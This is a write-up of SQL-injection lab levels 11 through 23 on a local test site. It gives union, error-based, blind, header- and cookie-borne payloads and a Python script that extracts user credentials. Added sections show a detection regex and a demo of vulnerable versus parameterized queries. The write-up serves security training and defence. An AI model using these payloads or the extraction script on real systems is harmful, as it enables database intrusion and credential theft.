SQL injection lab (levels 11-23)

Contents

Level 11 (POST injection)
Level 12
Level 13
Level 14
Level 15
Level 16
Level 17
Level 18
Level 19
Level 20
Level 21
Level 22
Level 23

Level 11 (POST injection)
Looking at the page, there is an injection point, so we can try union-based injection. Union injection turns out to work, so the next step is to dump the database name, the tables, the columns, and the user accounts and passwords.

aaa' union select 1,database()#
aaa' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#
aaa' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
aaa' union select 1,group_concat(username,0x3a,password) from users#

Result (screenshot)

Level 12
Looking at the page and testing, this level differs from level 11 only in how the quote is closed.

aaa") union select 1,database()#
aaa") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#
aaa") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
aaa") union select 1,group_concat(username,0x3a,password) from users#

Result (screenshot)

Level 13
Looking at the page and testing, only error-based injection returns any output on this level, and the closing sequence also differs from before.

aaa') and updatexml(1,user(),1)#
aaa') and updatexml(1,concat('~',(select database()),'~'),1)#
aaa') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
aaa') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#
aaa') and updatexml(1,concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),1)#

Because only one value can be shown at a time, we use limit to output the rows one by one. I only show the first username/password pair here; do the rest yourself.

Level 14
Looking at the page and testing, this level differs from level 13 only in the closing sequence, so we still use error-based injection.

aaa" and updatexml(1,user(),1)#
aaa" and updatexml(1,concat('~',(select database()),'~'),1)#
aaa" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
aaa" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#
aaa" and updatexml(1,concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),1)#

Result (screenshot)

Level 15
Looking at the page and testing repeatedly, it only ever shows a success screen or a failure screen, so my first thought is boolean-based blind injection. We use a script to dump this level directly.
```python
import requests

# Boolean-blind extraction script for Less-15. The original post repeats the
# same function four times (database name, table names, column names, users and
# passwords) with the first three commented out; here the expression to extract
# is a parameter instead. The success page contains flag.jpg, the failure page
# does not, and that difference is the one bit of information each request leaks.

TARGETS = {
    'database': "database()",
    'tables': "(select group_concat(table_name) from information_schema.tables where table_schema='security')",
    'columns': "(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')",
    'users': "(select group_concat(username, 0x3a, password) from users)",
}


def inject_database(url, expr):
    name = ''
    for i in range(1, 20):              # character position, at most 19 characters
        min_value = 32
        max_value = 128
        mid = (min_value + max_value) // 2
        while min_value < max_value:    # binary search over the ASCII value
            data = {
                'uname': "aaa' or ascii(substr(%s,%d,1)) > %d#" % (expr, i, mid),
                'passwd': 'aaa',
            }
            r = requests.post(url=url, data=data)
            if 'flag.jpg' in r.text:    # success page: the character is greater than mid
                min_value = mid + 1
            else:
                max_value = mid
            mid = (min_value + max_value) // 2
        if mid == 32:                   # substr() ran past the end of the string
            break
        name += chr(mid)
        print(name)
    return name


if __name__ == '__main__':
    url = 'http://127.0.0.1/sqllabs/Less-15/'
    inject_database(url, TARGETS['users'])
```
Result (screenshot)

Level 16

Looking at the page, this level differs from level 15 only in the closing sequence.
```python
import requests

# Same boolean-blind script as Less-15; only the closing sequence (") and the
# URL change. As above, the four repeated copies of the original post are
# collapsed into one function that takes the expression to extract.

TARGETS = {
    'database': "database()",
    'tables': "(select group_concat(table_name) from information_schema.tables where table_schema='security')",
    'columns': "(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')",
    'users': "(select group_concat(username, 0x3a, password) from users)",
}


def inject_database(url, expr):
    name = ''
    for i in range(1, 20):              # character position, at most 19 characters
        min_value = 32
        max_value = 128
        mid = (min_value + max_value) // 2
        while min_value < max_value:    # binary search over the ASCII value
            data = {
                'uname': 'aaa") or ascii(substr(%s,%d,1)) > %d#' % (expr, i, mid),
                'passwd': 'aaa',
            }
            r = requests.post(url=url, data=data)
            if 'flag.jpg' in r.text:    # success page: the character is greater than mid
                min_value = mid + 1
            else:
                max_value = mid
            mid = (min_value + max_value) // 2
        if mid == 32:                   # substr() ran past the end of the string
            break
        name += chr(mid)
        print(name)
    return name


if __name__ == '__main__':
    url = 'http://127.0.0.1/sqllabs/Less-16/'
    inject_database(url, TARGETS['users'])
```
Result (screenshot)

Level 17

Reading the source for this level shows that username can no longer be injected, but password still can, with one precondition: the username must be entered correctly. Looking at the page, this level is actually a password-reset form, and to reset a password you have to know the username. That confirms my idea: the injection goes in the password field.

aaa' and updatexml(1,user(),1)#
aaa' and updatexml(1,concat('~',(select database()),'~'),1)#
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#
1' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)#

Result (screenshot): the username and password are dumped successfully; to dump more, just change the offset after limit.
Level 18

Looking at the page

After testing, this level feels somewhat different from the previous ones. Reading the source, the injection point is in the User-Agent header, so we can capture the request and inject there, using Burp Suite as the proxy.

First capture the request with the Proxy module, then send it to Repeater to analyse and modify it. The injection point is clearly visible.

aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1
aaa' and updatexml(1,concat('~',(select database()),'~'),1) and '1'='1
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) and '1'='1
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) and '1'='1
1' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

The username and password are dumped successfully.
Level 19

Looking at the page, this level seems similar to level 18.

I went straight to capturing the request, and repeated testing showed the injection point is in the Referer header, so I can inject there directly.

aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1
aaa' and updatexml(1,concat('~',(select database()),'~'),1) and '1'='1
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) and '1'='1
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) and '1'='1
1' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

Result (screenshot)

Level 20
After logging in, the cookie is displayed rather prominently on the page, so I capture the request and modify the cookie to see whether it is an injection point. Clearly it is.

aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1
aaa' and updatexml(1,concat('~',(select database()),'~'),1) and '1'='1
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) and '1'='1
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) and '1'='1
admin' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

Result (screenshot)

Level 21
After logging in, the cookie on this page is encoded, so I have reason to guess that encoding the payload before injecting it might get something back. Trying it shows the guess was right: the payloads are base64-encoded and then injected. Burp Suite's built-in Decoder module is handy here. The payloads are below; encode them yourself.

aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1
aaa' and updatexml(1,concat('~',(select database()),'~'),1) and '1'='1
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) and '1'='1
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) and '1'='1
admin' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

Result (screenshot)

Level 22
After logging in, the cookie is still encoded, so I suspect the closing sequence has changed; just try it. This one also needs base64 encoding; encode it yourself.

aaa" and updatexml(1,concat(0x7e,(select user()),0x7e),1) and "1"="1
aaa" and updatexml(1,concat('~',(select database()),'~'),1) and "1"="1
1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) and "1"="1
1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) and "1"="1
admin" and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and "1"="1
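From level 18 onward the payload shape stays the same while its carrier changes: POST body (levels 11-17), User-Agent (18), Referer (19), Cookie (20), and a base64-encoded cookie (21, 22), so a checker that only looks at form fields misses most of them. The following is an added detection example, not code from the original post: it inspects every field of a request, URL- and base64-decodes each value before matching, and uses the payload shapes seen in this walkthrough as signatures. The field names and the sample requests are constructed for the example.

```python
import base64
import re
from urllib.parse import unquote

# Signatures taken from the payload shapes used in this walkthrough.
PATTERNS = [
    r"\bunion\b\s+(?:all\s+)?select\b",
    r"\bupdatexml\s*\(",
    r"information_schema\.",
    r"\bascii\s*\(\s*substr",
    r"floor\s*\(\s*rand\s*\(",
    r"['\"]\s*(?:and|or)\s+['\"]?1['\"]?\s*=\s*['\"]?1",
]
RX = re.compile("|".join(PATTERNS), re.IGNORECASE)

def decodings(value):
    """Yield the raw value, its URL-decoded form, and a base64 decoding if it parses."""
    dec = unquote(value)
    yield value
    if dec != value:
        yield dec
    try:
        padded = dec + "=" * (-len(dec) % 4)   # tolerate stripped padding
        yield base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError: not base64, nothing more to try
        pass

def inspect_request(req):
    """Return [(field, matched_text)] for every field of req that looks injected."""
    hits = []
    for field, value in req.items():
        for variant in decodings(value):
            m = RX.search(variant)
            if m:
                hits.append((field, m.group(0)))
                break
    return hits

# Constructed sample requests, one per injection location seen above (hypothetical
# field names: form fields, request headers, and the uname cookie value).
def _b64(s): return base64.b64encode(s.encode()).decode()
SAMPLES = {
    "less15_body": {"uname": "aaa' or ascii(substr(database(),1,1)) > 96#", "passwd": "aaa"},
    "less18_ua": {"uname": "admin",
                  "User-Agent": "aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1"},
    "less21_cookie": {"cookie.uname": _b64("admin' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1")},
    "benign": {"uname": "o'brien", "passwd": "Pa$$w0rd", "User-Agent": "Mozilla/5.0",
               "cookie.uname": _b64("o'brien")},
}
```

Note that the base64 cookie value matches nothing in its raw form and is only caught after decoding, which is exactly the gap levels 21 and 22 rely on.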
Result (screenshot)

Level 23
Looking at the page, this level goes back to our old friend, GET parameters. After many attempts with no way in, reading the source shows that this level filters the input.

Thinking about it: since the comment characters are filtered, let's try closing the quote ourselves instead. Testing confirms this works.

So here is the full dump.

Tables:

http://127.0.0.1/sqllabs/less-23/?id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27%20and%20%271%27=%271

Columns:

http://127.0.0.1/sqllabs/less-23/?id=-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27%20and%20%271%27=%271

Users and passwords:

http://127.0.0.1/sqllabs/less-23/?id=-1%27%20union%20select%201,2,group_concat(username%20,0x3a%20,%20password)%20from%20users%20where%20%271%27=%271
Result (screenshot). Level 24 will go in a separate article, because it is a second-order injection, and I will also bring in two CTF second-order injection challenges.
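Level 23 shows why a comment-token blacklist is not a fix: the walkthrough gets past it simply by closing the quote with and '1'='1 instead of a comment. The following is an added example, not code from the original post, that reproduces this against a constructed two-row users table in SQLite (sqlite3 stands in for MySQL, so || ':' || replaces group_concat(username,0x3a,password)): the concatenated query and the filtered query both return every user, while the parameterized query returns nothing for the same input.

```python
import re
import sqlite3

def make_db():
    """Constructed stand-in for the lab's users table, two rows."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users(id integer, username text, password text)")
    con.executemany("insert into users values(?,?,?)",
                    [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    return con

def strip_comments(value):
    """Level 23 style blacklist: delete SQL comment tokens from the input."""
    return re.sub(r"#|--|/\*|\*/", "", value)

def lookup_concat(con, user_id):
    """Vulnerable: the id is pasted into the query text, as the lab does."""
    sql = "select id, username, password from users where id='%s' limit 1" % user_id
    return con.execute(sql).fetchall()

def lookup_filtered(con, user_id):
    """Still vulnerable: same query, input run through the comment blacklist first."""
    return lookup_concat(con, strip_comments(user_id))

def lookup_param(con, user_id):
    """Fixed: a bound parameter is data only; it cannot change the query structure."""
    sql = "select id, username, password from users where id=? limit 1"
    return con.execute(sql, (user_id,)).fetchall()

# The level 23 shape: no comment token, the trailing quote is closed with and '1'='1,
# so strip_comments() has nothing to remove and the blacklist changes nothing.
PAYLOAD = "-1' union select 1, 2, group_concat(username || ':' || password) from users where '1'='1"

def demo():
    """Run the same input through all three lookups; returns the rows each yields."""
    con = make_db()
    return {
        "normal": lookup_param(con, "1"),
        "concat": lookup_concat(con, PAYLOAD),
        "filtered": lookup_filtered(con, PAYLOAD),
        "param": lookup_param(con, PAYLOAD),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```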